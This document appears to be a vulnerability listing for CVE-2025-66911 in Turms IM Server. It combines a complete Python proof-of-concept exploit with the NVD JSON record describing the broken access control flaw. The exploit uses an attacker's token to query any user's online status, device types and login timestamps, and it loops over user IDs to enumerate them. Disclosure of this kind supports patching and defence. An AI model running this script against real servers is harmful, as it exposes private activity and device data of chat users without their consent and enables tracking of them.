CVE-2025-66911

import requests import json # CVE-2025-66911 PoC - Turms IM Server Unauthorized User Status Query # Target: Turms IM Server < v0.10.0-SNAPSHOT TARGET_HOST = "http://target-server:9510" ATTACKER_TOKEN = "attacker_auth_token_here" def query_user_online_status(target_user_id): """ Query arbitrary user's online status without authorization """ endpoint = f"{TARGET_HOST}/user/queryOnlineStatuses" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } payload = { "userIds": [target_user_id], "deviceTypes": True, "loginTimestamps": True } try: response = requests.post(endpoint, json=payload, headers=headers) if response.status_code == 200: data = response.json() print(f"[+] Successfully queried user {target_user_id}") print(f"[+] Response: {json.dumps(data, indent=2)}") return data else: print(f"[-] Failed: {response.status_code}") return None except Exception as e: print(f"[-] Error: {e}") return None def enumerate_users(start_id=1, count=10): """ Enumerate multiple users' online status """ print(f"[*] Enumerating {count} users starting from ID {start_id}") for user_id in range(start_id, start_id + count): query_user_online_status(user_id) if __name__ == "__main__": # Query specific user target_user = 12345 query_user_online_status(target_user) # Or enumerate multiple users enumerate_users(1, 100)

{"cve": {"id": "CVE-2025-66911", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:56.900", "lastModified": "2026-01-02T19:49:06.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Turms IM Server v0.10.0-SNAPSHOT and earlier contains a broken access control vulnerability in the user online status query functionality. The handleQueryUserOnlineStatusesRequest() method in UserServiceController.java allows any authenticated user to query the online status, device information, and login timestamps of arbitrary users without proper authorization checks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:*", "matchCriteriaId": "9466432E-2863-4A5B-913F-E6E64090F60B"}]}]}], "references": [{"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66911_report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/turms-im/turms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/turms-im/turms/blob/develop/turms-service/src/main/java/im/turms/service/domain/user/access/servicerequest/controller/UserServiceController.java#L239", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66911_report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}